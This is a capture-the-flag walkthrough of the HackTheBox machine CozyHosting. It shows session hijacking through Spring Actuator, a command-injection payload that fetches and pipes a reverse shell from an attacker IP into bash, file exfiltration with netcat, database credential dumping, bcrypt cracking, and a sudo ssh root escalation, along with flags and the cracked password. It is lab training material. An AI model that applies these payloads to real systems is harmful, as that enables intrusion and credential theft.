CozyHosting

Recon

HTTP (80)

Standard landing page, with login

From the error the backend should be Spring Boot Framework, Java

└─$ feroxbuster -u 'http://cozyhosting.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt
──────────────────────────────────────────────────
404      GET        1l        2w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       38l      135w     8621c http://cozyhosting.htb/assets/img/logo.png
200      GET       43l      241w    19406c http://cozyhosting.htb/assets/img/pricing-business.png
200      GET       29l      174w    14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200      GET       38l      135w     8621c http://cozyhosting.htb/assets/img/favicon.png
200      GET       81l      517w    40968c http://cozyhosting.htb/assets/img/hero-img.png
200      GET       29l      131w    11970c http://cozyhosting.htb/assets/img/pricing-free.png
200      GET      295l      641w     6890c http://cozyhosting.htb/assets/js/main.js
200      GET        1l      313w    14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200      GET       97l      196w     4431c http://cozyhosting.htb/login
200      GET       73l      470w    37464c http://cozyhosting.htb/assets/img/values-1.png
200      GET        1l      625w    55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200      GET       34l      172w    14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200      GET       79l      519w    40905c http://cozyhosting.htb/assets/img/values-2.png
200      GET        1l      218w    26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200      GET       83l      453w    36234c http://cozyhosting.htb/assets/img/values-3.png
200      GET     2397l     4846w    42231c http://cozyhosting.htb/assets/css/style.css
200      GET        7l     1222w    80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200      GET     2018l    10020w    95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200      GET        7l     2189w   194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200      GET       14l     1684w   143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
200      GET      285l      745w    12706c http://cozyhosting.htb/
401      GET        1l        1w       97c http://cozyhosting.htb/admin
500      GET        1l        1w       73c http://cozyhosting.htb/error
200      GET      285l      745w    12706c http://cozyhosting.htb/index
204      GET        0l        0w        0c http://cozyhosting.htb/logout
[####################] - 23s     4763/4763    0s      found:26      errors:0
[####################] - 22s     4728/4728    211/s   http://cozyhosting.htb/

Spring Actuator is debugging tool implemented in Spring Boot, which shouldn't be used in prod.https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators

http://cozyhosting.htb/actuator/env - validate that endpoint exists. Not useful information, but endpoint existing means exploit vector exists too.

└─$ curl http://cozyhosting.htb/actuator/mappings -s | jq '.contexts.application.mappings.dispatcherServlets.dispatcherServlet[].predicate'
"{GET [/actuator/env/{toMatch}], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/env], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/beans], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/mappings], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/health/**], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/health], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/sessions], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{ [/error], produces [text/html]}"
"{POST [/executessh]}"
"{ [/error]}"
"/admin"
"/addhost"
"/index"
"/login"
"/webjars/**"
"/**"

sessions is unusual endpoint

└─$ curl http://cozyhosting.htb/actuator/sessions -s | jq
{
  "8EE773FBF5B5DF2599C64F9D3A041B24": "kanderson",
  "9EA5C959E316A20A75099C5FA20441E3": "UNAUTHORIZED"
}

Looks like we can login with the cookies. We already have JSESSIONID cookie (second one is us), modify it with kanderson cookie and go to /admin

Command injection is successful inside the Username, username can't contain whitespaces and hostname should be valid?

There's a weird command injection tho, curl IP|bash didn't work, but sh worked without reverse shell...

LFI is possible (partially)

We can also leak the command with more semicolons.

host=x&username=;;{curl,-h};

Location: http://cozyhosting.htb/admin?error=/bin/bash: -c: line 1: syntax error near unexpected token `;;'/bin/bash: -c: line 1: `ssh -o ConnectTimeout=1 ;;{curl,-h};@x'

Revshell was possible with this type of chain:

host=x&username=;curl${IFS}10.10.14.42/rev|bash;

Download the server jar file

└─$ listen > cloudhosting-0.0.1.jar
---
$ busybox nc 10.10.14.42 4444 < /app/cloudhosting-0.0.1.jar

Use jd-gui to decompile the jar file.

spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting  
spring.datasource.username=postgres  
spring.datasource.password=Vg&nvzAQ7XxR

PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -d cozyhosting -c '\dt'

$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -c '\l'
                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres

$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -d cozyhosting -c '\dt'
         List of relations
 Schema | Name  | Type  |  Owner
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres

$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -d cozyhosting -c 'SELECT * FROM users;'
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

Crack the password for admin

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:23 DONE (2024-11-24 20:39) 0.04219g/s 118.4p/s 118.4c/s 118.4C/s onlyme..keyboard
Use the "--show" option to display all of the cracked passwords reliably
Session completed

SSH (22)

Josh is the only user on box, so he's probably admin. SSH is successful.

Creds: josh:manchesterunited

└─$ sshpass -p 'manchesterunited' ssh josh@cozyhosting.htb
josh@cozyhosting:~$ id
uid=1003(josh) gid=1003(josh) groups=1003(josh)

User.txt

josh@cozyhosting:~$ cat user.txt
92f667a3c4b19fd327f7c82bbba9755b

Privilege Escalation

josh@cozyhosting:~$ sudo -l
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

https://gtfobins.github.io/gtfobins/ssh/

josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

# cd
# cat root.txt
b1dcd5867d771d9f5042edb0fd04a4d9

PreviousAuthority NextCybermonday

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagSSH (22)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt